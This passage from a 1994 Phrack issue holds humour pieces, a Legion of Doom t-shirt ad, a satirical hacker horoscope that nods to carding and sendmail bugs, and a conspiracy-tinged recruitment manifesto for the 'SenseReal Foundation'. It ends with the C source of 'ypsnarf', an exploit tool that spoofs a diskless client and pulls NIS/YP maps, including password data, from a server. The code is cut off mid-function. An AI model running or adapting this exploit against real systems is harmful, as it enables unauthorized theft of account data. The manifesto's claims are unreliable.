before and told him, and then told everyone that was on the conference
|
|||
|
the night before. It ended up that the fugitives never even entered
|
|||
|
our state. They were caught a week later around thirty miles from
|
|||
|
the prison they escaped from. Now I am known by two nicknames. "NatureBoy"
|
|||
|
because everyone says I communed with nature for a hour and a half hiding
|
|||
|
from the police, and "The Fugitive" for obvious reasons. Anywayz, That's
|
|||
|
how I was almost busted..
|
|||
|
|
|||
|
-DS
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
The following is a *true* story. It amused the hell out of me while it
|
|||
|
was happening. I hope it isn't one of those "had to be there" things.
|
|||
|
Copyright 1994 Captain Sarcastic, all rights reserved.
|
|||
|
|
|||
|
On my way home from the second job I've taken for the extra holiday ca$h I
|
|||
|
need, I stopped at Taco Bell for a quick bite to eat. In my billfold is
|
|||
|
a $50 bill and a $2 bill. That is all of the cash I have on my person.
|
|||
|
I figure that with a $2 bill, I can get something to eat and not have to
|
|||
|
worry about people getting pissed at me.
|
|||
|
|
|||
|
ME: "Hi, I'd like one seven layer burrito please, to go."
|
|||
|
IT: "Is that it?"
|
|||
|
ME: "Yep."
|
|||
|
IT: "That'll be $1.04, eat here?"
|
|||
|
ME: "No, it's *to* *go*." [I hate effort duplication.]
|
|||
|
|
|||
|
At his point I open my billfold and hand him the $2 bill. He looks at it
|
|||
|
kind of funny and
|
|||
|
|
|||
|
IT: "Uh, hang on a sec, I'll be right back."
|
|||
|
|
|||
|
He goes to talk to his manager, who is still within earshot. The
|
|||
|
following conversation occurs between the two of them.
|
|||
|
|
|||
|
IT: "Hey, you ever see a $2 bill?"
|
|||
|
MG: "No. A what?"
|
|||
|
IT: "A $2 bill. This guy just gave it to me."
|
|||
|
MG: "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp]
|
|||
|
IT: "Yeah, thought so."
|
|||
|
|
|||
|
He comes back to me and says
|
|||
|
|
|||
|
IT: "We don't take these. Do you have anything else?"
|
|||
|
ME: "Just this fifty. You don't take $2 bills? Why?"
|
|||
|
IT: "I don't know."
|
|||
|
ME: "See here where it says legal tender?"
|
|||
|
IT: "Yeah."
|
|||
|
ME: "So, shouldn't you take it?"
|
|||
|
IT: "Well, hang on a sec."
|
|||
|
|
|||
|
He goes back to his manager who is watching me like I'm going to
|
|||
|
shoplift, and
|
|||
|
|
|||
|
IT: "He says I have to take it."
|
|||
|
MG: "Doesn't he have anything else?"
|
|||
|
IT: "Yeah, a fifty. I'll get it and you can open the safe and get change."
|
|||
|
MG: "I'M NOT OPENING THE SAFE WITH HIM IN HERE." [my emp]
|
|||
|
IT: "What should I do?"
|
|||
|
MG: "Tell him to come back later when he has REAL money."
|
|||
|
IT: "I can't tell him that, you tell him."
|
|||
|
MG: "Just tell him."
|
|||
|
IT: "No way, this is weird, I'm going in back."
|
|||
|
|
|||
|
The manager approaches me and says
|
|||
|
|
|||
|
MG: "Sorry, we don't take big bills this time of night." [it was 8pm and
|
|||
|
this particular Taco Bell is in a well lighted indoor mall with 100
|
|||
|
other stores.]
|
|||
|
ME: "Well, here's a two."
|
|||
|
MG: "We don't take *those* either."
|
|||
|
ME: "Why the hell not?"
|
|||
|
MG: "I think you *know* why."
|
|||
|
ME: "No really, tell me, why?"
|
|||
|
MG: "Please leave before I call mall security."
|
|||
|
ME: "Excuse me?"
|
|||
|
MG: "Please leave before I call mall security."
|
|||
|
ME: "What the hell for?"
|
|||
|
MG: "Please, sir."
|
|||
|
ME: "Uh, go ahead, call them."
|
|||
|
MG: "Would you please just leave?"
|
|||
|
ME: "No."
|
|||
|
MG: "Fine, have it your way then."
|
|||
|
ME: "No, that's Burger King, isn't it?"
|
|||
|
|
|||
|
At this point he BACKS away from me and calls mall security on the phone
|
|||
|
around the corner. I have two people STARING at me from the dining area,
|
|||
|
and I begin laughing out loud, just for effect. A few minutes later this
|
|||
|
45 year oldish guy comes in and says [at the other end of counter, in a
|
|||
|
whisper]
|
|||
|
|
|||
|
SG: "Yeah, Mike, what's up?"
|
|||
|
MG: "This guy is trying to give me some [pause] funny money."
|
|||
|
SG: "Really? What?"
|
|||
|
MG: "Get this, a *two* dollar bill."
|
|||
|
SG: "Why would a guy fake a $2 bill?" [incredulous]
|
|||
|
MG: "I don't know? He's kinda weird. Says the only other thing he has is
|
|||
|
a fifty."
|
|||
|
SG: "So, the fifty's fake?"
|
|||
|
MG: "NO, the $2 is."
|
|||
|
SG: "Why would he fake a $2 bill?"
|
|||
|
MG: "I don't know. Can you talk to him, and get him out of here?"
|
|||
|
SG: "Yeah..."
|
|||
|
|
|||
|
Security guard walks over to me and says
|
|||
|
|
|||
|
SG: "Mike here tells me you have some fake bills you're trying to use."
|
|||
|
ME: "Uh, no."
|
|||
|
SG: "Lemme see 'em."
|
|||
|
ME: "Why?"
|
|||
|
SG: "Do you want me to get the cops in here?"
|
|||
|
|
|||
|
At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
|
|||
|
I said
|
|||
|
|
|||
|
ME: "I'm just trying to buy a burrito and pay for it with this $2 bill."
|
|||
|
|
|||
|
I put the bill up near his face, and he flinches like I was taking a
|
|||
|
swing at him. He takes the bill, turns it over a few times in his hands,
|
|||
|
and says
|
|||
|
|
|||
|
SG: "Mike, what's wrong with this bill?"
|
|||
|
MG: "It's fake."
|
|||
|
SG: "It doesn't look fake to me."
|
|||
|
MG: "But it's a **$2** bill."
|
|||
|
SG: "Yeah?"
|
|||
|
MG: "Well, there's no such thing, is there?"
|
|||
|
|
|||
|
The security guard and I both looked at him like he was an idiot, and it
|
|||
|
dawned on the guy that he had no clue.
|
|||
|
|
|||
|
My burrito was free and he threw in a small drink and those cinnamon
|
|||
|
things, too. Makes me want to get a whole stack of $2 bills just to see
|
|||
|
what happens when I try to buy stuff. If I got the right group of
|
|||
|
people, I could probably end up in jail. At least you get free food.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 4 of 28
|
|||
|
|
|||
|
|
|||
|
// // /\ // ====
|
|||
|
// // //\\ // ====
|
|||
|
==== // // \\/ ====
|
|||
|
|
|||
|
/\ // // \\ // /=== ====
|
|||
|
//\\ // // // // \=\ ====
|
|||
|
// \\/ \\ // // ===/ ====
|
|||
|
|
|||
|
PART II
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
The official Legion of Doom t-shirts are still available.
|
|||
|
Join the net.luminaries world-wide in owning one of
|
|||
|
these amazing shirts. Impress members of the opposite sex, increase
|
|||
|
your IQ, annoy system administrators, get raided by the government and
|
|||
|
lose your wardrobe!
|
|||
|
|
|||
|
Can a t-shirt really do all this? Of course it can!
|
|||
|
|
|||
|
--------------------------------------------------------------------------
|
|||
|
|
|||
|
"THE HACKER WAR -- LOD vs MOD"
|
|||
|
|
|||
|
This t-shirt chronicles the infamous "Hacker War" between rival
|
|||
|
groups The Legion of Doom and The Masters of Destruction. The front
|
|||
|
of the shirt displays a flight map of the various battle-sites
|
|||
|
hit by MOD and tracked by LOD. The back of the shirt
|
|||
|
has a detailed timeline of the key dates in the conflict, and
|
|||
|
a rather ironic quote from an MOD member.
|
|||
|
|
|||
|
(For a limited time, the original is back!)
|
|||
|
|
|||
|
"LEGION OF DOOM -- INTERNET WORLD TOUR"
|
|||
|
|
|||
|
The front of this classic shirt displays "Legion of Doom Internet World
|
|||
|
Tour" as well as a sword and telephone intersecting the planet
|
|||
|
earth, skull-and-crossbones style. The back displays the
|
|||
|
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
|
|||
|
(internet sites) and a quote from Aleister Crowley.
|
|||
|
|
|||
|
--------------------------------------------------------------------------
|
|||
|
|
|||
|
All t-shirts are sized XL, and are 100% cotton.
|
|||
|
|
|||
|
Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for
|
|||
|
postage.
|
|||
|
|
|||
|
Send checks or money orders. Please, no credit cards, even if
|
|||
|
it's really your card.
|
|||
|
|
|||
|
|
|||
|
Name: __________________________________________________
|
|||
|
|
|||
|
Address: __________________________________________________
|
|||
|
|
|||
|
City, State, Zip: __________________________________________
|
|||
|
|
|||
|
|
|||
|
I want ____ "Hacker War" shirt(s)
|
|||
|
|
|||
|
I want ____ "Internet World Tour" shirt(s)
|
|||
|
|
|||
|
Enclosed is $______ for the total cost.
|
|||
|
|
|||
|
|
|||
|
Mail to: Chris Goggans
|
|||
|
603 W. 13th #1A-278
|
|||
|
Austin, TX 78701
|
|||
|
|
|||
|
|
|||
|
These T-shirts are sold only as a novelty items, and are in no way
|
|||
|
attempting to glorify computer crime.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
introducing...
|
|||
|
|
|||
|
The PHRACK Horoscope, Summer 1994
|
|||
|
|
|||
|
Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
Do you believe in the stars? Many do, some don't. In fact, the stars
|
|||
|
can tell you a whole lot about the future. That's bullshit? You don't
|
|||
|
believe it? Good. Be doomed. See you in hell. Here's the official PHRACK
|
|||
|
horoscope for all eleet hackerz for the summer of 1994.
|
|||
|
|
|||
|
You can use this chart to find out your zodiac sign by your DOB.
|
|||
|
|
|||
|
Aquarius.....01/20 - 02/18 Leo..........07/23 - 08/22
|
|||
|
Pisces.......02/19 - 03/20 Virgo........08/23 - 09/22
|
|||
|
Aries........03/21 - 04/19 Libra........09/23 - 10/22
|
|||
|
Taurus.......04/20 - 05/20 Scorpio......10/23 - 11/21
|
|||
|
Gemini.......05/21 - 06/20 Sagittarius..11/22 - 12/21
|
|||
|
Cancer.......06/21 - 07/22 Capricorn....12/22 - 01/19
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
oOo This summer's best combinations oOo
|
|||
|
|
|||
|
YOU LOVE BS VICTIM H0T WAREZ
|
|||
|
==============================================================
|
|||
|
Aquarius Libra Leo Sagittarius
|
|||
|
Pisces Sagittarius Aquarius Cancer
|
|||
|
Aries Aries Cancer Capricorn
|
|||
|
Taurus Gemini Pisces Taurus
|
|||
|
Gemini Cancer Aries Scorpio
|
|||
|
Cancer Leo Virgo Gemini
|
|||
|
Leo Scorpio Gemini Leo
|
|||
|
Virgo Capricorn Sagittarius Libra
|
|||
|
Libra Virgo Libra Virgo
|
|||
|
Scorpio Pisces Capricorn Pisces
|
|||
|
Sagittarius Aquarius Scorpio Aquarius
|
|||
|
Capricorn Taurus Taurus Aries
|
|||
|
==============================================================
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!
|
|||
|
|
|||
|
Aries [March 21st - April 19th]
|
|||
|
|
|||
|
There is a pot full of k0DeZ at the end of the rainbow for you.
|
|||
|
Try to channel all your ambition on finding it, hint: you won't
|
|||
|
find it in /bin/gif/kitchen.gear.
|
|||
|
Warning: Risk of bust between August 5th and August 10th!
|
|||
|
Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]
|
|||
|
|
|||
|
Taurus [April 20th - May 20th]
|
|||
|
|
|||
|
PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
|
|||
|
Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake
|
|||
|
any interstellar space travel, and avoid big yellow ships.
|
|||
|
Watch out for SprintNet Security between July 12th and August 1st.
|
|||
|
Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]
|
|||
|
|
|||
|
Gemini [May 21st - June 20th]
|
|||
|
|
|||
|
There might be a force dragging you into warez boards. Try to resist
|
|||
|
the attraction, or you might be thrown out of the paradise.
|
|||
|
Hint: If a stranger with a /ASL connect crosses your way, stay away
|
|||
|
from him.
|
|||
|
Warning: Your Dual Standard HST might explode sometime in June.
|
|||
|
Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
|
|||
|
|
|||
|
Cancer [June 21st - July 22nd]
|
|||
|
|
|||
|
There are dark forces on your trail. Try to avoid all people wearing
|
|||
|
suits, don't get in their cars, and don't let them give you shit.
|
|||
|
Hint: Leave the country as soon if you can, or you won't be able to.
|
|||
|
Look out for U4EA on IRC in late July, you might get /killed.
|
|||
|
Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]
|
|||
|
|
|||
|
Leo [July 23rd - August 22nd]
|
|||
|
|
|||
|
The path of Venus this year tells us that there is love on the way
|
|||
|
for you. Don't look for it on X-rated ftp sites, it might be out there
|
|||
|
somewhere. Hint: Try getting out of the house more frequently or you
|
|||
|
might miss it.
|
|||
|
Warning: If Monica Weaver comes across your way, break and run!
|
|||
|
Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]
|
|||
|
|
|||
|
Virgo [August 23rd - September 22nd]
|
|||
|
|
|||
|
Pluto tells us that you should stay away from VAXes in the near future.
|
|||
|
Lunatic force tells us that you might have more luck on Berkeley UNIX.
|
|||
|
Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs.
|
|||
|
Warning: In the first week of October, there is a risk of being ANIed.
|
|||
|
Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]
|
|||
|
|
|||
|
Libra [September 23rd - October 22nd]
|
|||
|
|
|||
|
The closer way of Mars around the Sun this year might mean that you
|
|||
|
will be sued by a telco or a big corporation. The eclipse of Uranus
|
|||
|
could say that you might have some luck and card a VGA 486 Laptop.
|
|||
|
Hint: Be careful on the cordless.
|
|||
|
Watch out for good stuff in dumpsters between July 23rd and July 31st.
|
|||
|
Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]
|
|||
|
|
|||
|
Scorpio [October 23rd - November 21st]
|
|||
|
|
|||
|
Sun propulsions say that you should spend more time exploring the
|
|||
|
innards of credit report systems, but be aware that Saturn reminds
|
|||
|
you that one local car dealer has his I.D. monitored.
|
|||
|
Hint: Stay out of #warez
|
|||
|
Warning: A star called 43-141 might be your doom. Watch out.
|
|||
|
Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]
|
|||
|
|
|||
|
Sagittarius [November 22nd - December 21st]
|
|||
|
|
|||
|
Cold storms on Pluto suggest that you don't try to play eleet
|
|||
|
anarchist on one of the upcoming cons. Pluto also sees that there
|
|||
|
might be a slight chance that you catch a bullet pestering a cop.
|
|||
|
Hint: Be nice to your relatives.
|
|||
|
You might get lucky BSing during the third week of August.
|
|||
|
Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]
|
|||
|
|
|||
|
Capricorn [December 22nd - January 19th]
|
|||
|
|
|||
|
This summer brings luck to you. Everything you try is about to work
|
|||
|
out. You might find financial gain in selling k0DeZ to local warez
|
|||
|
bozos. Hint: Don't try to BS at a number who is a prime number, they
|
|||
|
will trace your ass and beat you to death with a raw cucumber.
|
|||
|
Special kick of luck between June 14th and July 2nd.
|
|||
|
Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]
|
|||
|
|
|||
|
Aquarius [January 20th - February 18th]
|
|||
|
|
|||
|
The third moon of Saturn suggests to stay in bed over the whole
|
|||
|
summer, or everything will worsen. Avoid to go to any meetings
|
|||
|
and cons. Do not try to get up before September 11th.
|
|||
|
Hint: You can risk to call PRODIGY and have a gR3aT time.
|
|||
|
Warning: High chance of eavesdroping on your line on August 14th.
|
|||
|
Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]
|
|||
|
|
|||
|
Pisces [February 19th - March 20th]
|
|||
|
|
|||
|
Mars reads a high mobility this summer. You should try to go to a
|
|||
|
foreign county, maybe visit HEU II. Finances will be OK. Do not go
|
|||
|
on any buses for that might be your doom.
|
|||
|
Hint: Don't get a seat near a window, whatever you do.
|
|||
|
Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
|
|||
|
Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
|
|||
|
|
|||
|
|
|||
|
If your horoscope does not come true, complain to god@heaven.mil. 31337
|
|||
|
If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
The SenseReal Mission
|
|||
|
If you are reading this it indicates you have reached a point
|
|||
|
along your journey that you will have to decide whether you agree
|
|||
|
with The SenseReal Foundation or whether you think that those who
|
|||
|
believe and support The SenseReal Foundation are crazy. Your
|
|||
|
decision to join The SenseReal Foundation on it's mission will
|
|||
|
undoubtedly change your life forever. When you understand the
|
|||
|
reason it exists and what it seeks you will better know how to
|
|||
|
decide. That is why this text was created.
|
|||
|
He is known as Green Ghost. Some know him as Jim Nightshade. He
|
|||
|
was born in 1966. He is not a baby boomer and he is not a
|
|||
|
Generation Xer. He falls into that group of the population that
|
|||
|
has so far escaped definition. He is a (yberpunk. He was (yberpunk
|
|||
|
before (yberpunk was cool. He is the founder and leader of The
|
|||
|
SenseReal Foundation. You will learn more about him later.
|
|||
|
But first you will have to know about the background. There once
|
|||
|
was a man named Albert Hoffman. In 1943, on April 16 Hoffman
|
|||
|
absorbed a threshold amount of the drug known as LSD. He
|
|||
|
experienced "a peculiar restlessness". LSD since that time has
|
|||
|
played an important role in this world.
|
|||
|
There are other agents involved in the story. Mary Pinchot, JFK,
|
|||
|
Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley
|
|||
|
and many others. There are too many details and explanations
|
|||
|
necessary to explain everything here. But this does not matter.
|
|||
|
Because the SenseReal Foundation is about riding the wave. We
|
|||
|
believe that the ultimate goal cannot be defined. To define it
|
|||
|
would be to destroy it.
|
|||
|
The SenseReal Foundation hopes that things can be changed for
|
|||
|
the better. But we realize that the situation can become
|
|||
|
much worse. From what history teaches us and what we instinctively
|
|||
|
feel, we know that there is a great probability that things will
|
|||
|
get much worse before and if things ever get better. Doom looms
|
|||
|
on the horizon like an old friend.
|
|||
|
Freedom is being threatened every day and The SenseReal
|
|||
|
Foundation seeks to defend and seek Freedom. Big Brother is here
|
|||
|
NOW and to deny his existence is only to play into his hand. The
|
|||
|
goal of our government both here in America and worldwide is to
|
|||
|
remain in power and increase it's control of The People. To
|
|||
|
expose Big Brother and destroy him is one of the many goals of
|
|||
|
The SenseReal Foundation.
|
|||
|
As a member of (yberspace and an agent of The SenseReal
|
|||
|
Foundation you will have to carefully consider your interaction
|
|||
|
with the flow of Info. The ideals of Liberty must be maintained.
|
|||
|
The SenseReal Foundation provides a grounding point. The place
|
|||
|
where the spark transfers from plasma to light and back to plasma.
|
|||
|
Tesla was not on the wrong track. The SenseReal Foundation is a
|
|||
|
mechanism which seeks to increase Freedom. Only by learning more
|
|||
|
can we defeat the Evil. The Good must prevail.
|
|||
|
If you have the Hacker spirit and think along the same lines
|
|||
|
then The SenseReal Foundation may be your calling. If you think
|
|||
|
like J.R. Dobbs or Green Ghost then it is possible we can make it
|
|||
|
through The Apocalypse. A final date has never been announced for
|
|||
|
this event. Green Ghost does not claim to know the exact date but
|
|||
|
he does claim to have some Info on it.
|
|||
|
Green Ghost does not claim to have all the answers or even to
|
|||
|
know all the questions. He was first exposed to computers in the
|
|||
|
early 70's at his local high school. The first computer he ever
|
|||
|
used was a Honeywell terminal connected to a mainframe operated
|
|||
|
at the home office of Honeywell and operated for the school.
|
|||
|
This machine was programed by feeding it stacks of cards with
|
|||
|
boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
|
|||
|
up to a printer which served for the monitor. The text was typed
|
|||
|
out and the paper rolled out of the machine in great waves.
|
|||
|
This experience left him wanting more. Somewhere between the
|
|||
|
machine and the mind were all the questions and all the answers.
|
|||
|
The SenseReal Foundation will supply some of the means. We
|
|||
|
must all work together if we are to succeed. UNITED WE STAND,
|
|||
|
DIVIDED WE FALL. If you wish to participate with The SenseReal
|
|||
|
Foundation you must devote yourself to becoming an Info Agent.
|
|||
|
As an Info Agent it is your duty to seek Truth and Knowledge
|
|||
|
out wherever it is located. To Learn and to seek to increase
|
|||
|
the Learning of all at The SenseReal Foundation. Different
|
|||
|
people will be needed to help out in different ways.
|
|||
|
SenseReal's Info Agents are located all around the world and
|
|||
|
are in contact with fellow SenseReal members via any one of
|
|||
|
several SenseReal facilities. The primary establishment and
|
|||
|
headquarters of The SenseReal Foundation is SenseReal's own
|
|||
|
online system:
|
|||
|
T /-/ E /-/ /=\ ( /< E R ' S /\/\ /=\ /\/ S / O /\/
|
|||
|
>>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<<
|
|||
|
27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation
|
|||
|
Also contact via SenseReal's mail drop by writing or sending
|
|||
|
materials to: TSF \ Electronic Mail:
|
|||
|
P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us
|
|||
|
HILTON HEAD, SC 29938-6914 \
|
|||
|
The Hacker's /\/\ansion is a system like no other. While it is
|
|||
|
not your typical Hackers board it has much Info on Hacking. While
|
|||
|
it is not like any Adult system you've ever seen it has the most
|
|||
|
finest Adult material available anywhere. It is not a Warez board
|
|||
|
but we are definitely Pirates. Because we are (yberpunks. What
|
|||
|
makes the Hacker's Mansion different is our emphasis on quality.
|
|||
|
Everything that you find at The /-/acker's /\/\ansion is 1ST
|
|||
|
(lass. All the coolest E-zines are pursued here. Phrack, CUD, and
|
|||
|
Thought Virus to name just a few. Of course there is one other
|
|||
|
source for Thought Virus:
|
|||
|
Send E-Mail to: ListServ@neonate.atl.ga.us
|
|||
|
In the subject or body of the message write:
|
|||
|
FAQ ThoughtCriminals
|
|||
|
and you will receive the current issue in your E-Mail box in no
|
|||
|
time. If you wish to join the Thought Criminals mailing list and
|
|||
|
communicate with your fellow Thought Criminals via E-Mail then
|
|||
|
send another message to: ListServ@neonate.atl.ga.us
|
|||
|
and write the following in the subject or body of the message:
|
|||
|
Subscribe ThoughtCriminals Your-Address-Here
|
|||
|
or simply: Subscribe ThoughtCriminals
|
|||
|
To mail others on the Thought Criminals mailing list send a message
|
|||
|
to: ThoughtCriminals@neonate.atl.ga.us
|
|||
|
Tell us all. Communication is vital. Our survival may depend on
|
|||
|
it. The SenseReal Foundation is about the allegiance of many
|
|||
|
people, and indeed beings, as our friends from other planets can
|
|||
|
tell you. The EFF inspired us and was a model but we don't have
|
|||
|
the EFF's money so we need YOU. If you are someone who can
|
|||
|
contribute or who believes in The Cause or are just interested
|
|||
|
in Tax Resistance or the Free The Weed movement then you should
|
|||
|
join The SenseReal Foundation today. Contact us through any of
|
|||
|
above channels and become a Freedom Fighter today. Time is of
|
|||
|
the essence.
|
|||
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
** OLD SHIT THAT STILL WORKS **
|
|||
|
|
|||
|
- sometimes -
|
|||
|
|
|||
|
/*
|
|||
|
* THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN
|
|||
|
* THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE
|
|||
|
* IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM. PLEASE DO NOT
|
|||
|
* REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY.
|
|||
|
*
|
|||
|
* ypsnarf - exercise security holes in yp/nis.
|
|||
|
*
|
|||
|
* Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
|
|||
|
* (casper@fwi.uva.nl).
|
|||
|
*
|
|||
|
* Usage:
|
|||
|
* ypsnarf server client
|
|||
|
* - to obtain the yp domain name
|
|||
|
* ypsnarf server domain mapname
|
|||
|
* - to obtain a copy of a yp map
|
|||
|
* ypsnarf server domain maplist
|
|||
|
* - to obtain a list of yp maps
|
|||
|
*
|
|||
|
* In the first case, we lie and pretend to be the host "client", and send
|
|||
|
* a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this
|
|||
|
* to work, "server" must be running rpc.bootparamd, and "client" must be a
|
|||
|
* diskless client of (well, it must boot from) "server".
|
|||
|
*
|
|||
|
* In the second case, we send a YPPROC_DOMAIN request to the host "server",
|
|||
|
* asking if it serves domain "domain". If so, we send YPPROC_FIRST and
|
|||
|
* YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
|
|||
|
* "mapname". Note that you must specify the full yp map name, you cannot
|
|||
|
* use the shorthand names provided by "ypcat".
|
|||
|
*
|
|||
|
* In the third case, the special map name "maplist" tells ypsnarf to send
|
|||
|
* a YPPROC_MAPLIST request to the server and get the list of maps in domain
|
|||
|
* "domain", instead of getting the contents of a map. If the server has a
|
|||
|
* map called "maplist" you can't get it. Oh well.
|
|||
|
*
|
|||
|
* Since the callrpc() routine does not make any provision for timeouts, we
|
|||
|
* artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
|
|||
|
* initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
|
|||
|
*
|
|||
|
* This program uses UDP packets, which means there's a chance that things
|
|||
|
* will get dropped on the floor; it's not a reliable stream like TCP. In
|
|||
|
* practice though, this doesn't seem to be a problem.
|
|||
|
*
|
|||
|
* To compile:
|
|||
|
* cc -o ypsnarf ypsnarf.c -lrpcsvc
|
|||
|
*
|
|||
|
* David A. Curry
|
|||
|
* Purdue University
|
|||
|
* Engineering Computer Network
|
|||
|
* Electrical Engineering Building
|
|||
|
* West Lafayette, IN 47907
|
|||
|
* davy@ecn.purdue.edu
|
|||
|
* January, 1991
|
|||
|
*/
|
|||
|
#include <sys/param.h>
|
|||
|
#include <sys/socket.h>
|
|||
|
#include <netinet/in.h>
|
|||
|
#include <arpa/inet.h>
|
|||
|
#include <rpc/rpc.h>
|
|||
|
#include <rpcsvc/bootparam.h>
|
|||
|
#include <rpcsvc/yp_prot.h>
|
|||
|
#include <rpc/pmap_clnt.h>
|
|||
|
#include <sys/time.h>
|
|||
|
#include <signal.h>
|
|||
|
#include <string.h>
|
|||
|
#include <netdb.h>
|
|||
|
#include <stdio.h>
|
|||
|
|
|||
|
#define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd */
|
|||
|
#define YPSNARF_TIMEOUT1 15 /* timeout for initial request */
|
|||
|
#define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */
|
|||
|
|
|||
|
char *pname; /* program name */
|
|||
|
|
|||
|
main(argc, argv)
|
|||
|
char **argv;
|
|||
|
int argc;
|
|||
|
{
|
|||
|
char *server, *client, *domain, *mapname;
|
|||
|
|
|||
|
pname = *argv;
|
|||
|
|
|||
|
/*
|
|||
|
* Process arguments. This is less than robust, but then
|
|||
|
* hey, you're supposed to know what you're doing.
|
|||
|
*/
|
|||
|
switch (argc) {
|
|||
|
case 3:
|
|||
|
server = *++argv;
|
|||
|
client = *++argv;
|
|||
|
|
|||
|
get_yp_domain(server, client);
|
|||
|
exit(0);
|
|||
|
case 4:
|
|||
|
server = *++argv;
|
|||
|
domain = *++argv;
|
|||
|
mapname = *++argv;
|
|||
|
|
|||
|
if (strcmp(mapname, "maplist") == 0)
|
|||
|
get_yp_maplist(server, domain);
|
|||
|
else
|
|||
|
get_yp_map(server, domain, mapname);
|
|||
|
exit(0);
|
|||
|
default:
|
|||
|
fprintf(stderr, "Usage: %s server client -", pname);
|
|||
|
fprintf(stderr, "to obtain yp domain name\n");
|
|||
|
fprintf(stderr, " %s server domain mapname -", pname);
|
|||
|
fprintf(stderr, "to obtain contents of yp map\n");
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* get_yp_domain - figure out the yp domain used between server and client.
|
|||
|
*/
|
|||
|
get_yp_domain(server, client)
|
|||
|
char *server, *client;
|
|||
|
{
|
|||
|
long hostip;
|
|||
|
struct hostent *hp;
|
|||
|
bp_whoami_arg w_arg;
|
|||
|
bp_whoami_res w_res;
|
|||
|
extern void timeout();
|
|||
|
enum clnt_stat errcode;
|
|||
|
|
|||
|
/*
|
|||
|
* Just a sanity check, here.
|
|||
|
*/
|
|||
|
if ((hp = gethostbyname(server)) == NULL) {
|
|||
|
fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* Allow the client to be either an internet address or a
|
|||
|
* host name. Copy in the internet address.
|
|||
|
*/
|
|||
|
if ((hostip = inet_addr(client)) == -1) {
|
|||
|
if ((hp = gethostbyname(client)) == NULL) {
|
|||
|
fprintf(stderr, "%s: %s: unknown host.\n", pname,
|
|||
|
client);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
bcopy(hp->h_addr_list[0],
|
|||
|
(caddr_t) &w_arg.client_address.bp_address.ip_addr,
|
|||
|
hp->h_length);
|
|||
|
}
|
|||
|
else {
|
|||
|
bcopy((caddr_t) &hostip,
|
|||
|
(caddr_t) &w_arg.client_address.bp_address.ip_addr,
|
|||
|
sizeof(ip_addr_t));
|
|||
|
}
|
|||
|
|
|||
|
w_arg.client_address.address_type = IP_ADDR_TYPE;
|
|||
|
bzero((caddr_t) &w_res, sizeof(bp_whoami_res));
|
|||
|
|
|||
|
/*
|
|||
|
* Send a BOOTPARAMPROC_WHOAMI request to the server. This will
|
|||
|
* give us the yp domain in the response, IFF client boots from
|
|||
|
* the server.
|
|||
|
*/
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT1);
|
|||
|
|
|||
|
errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
|
|||
|
BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
|
|||
|
xdr_bp_whoami_res, &w_res);
|
|||
|
|
|||
|
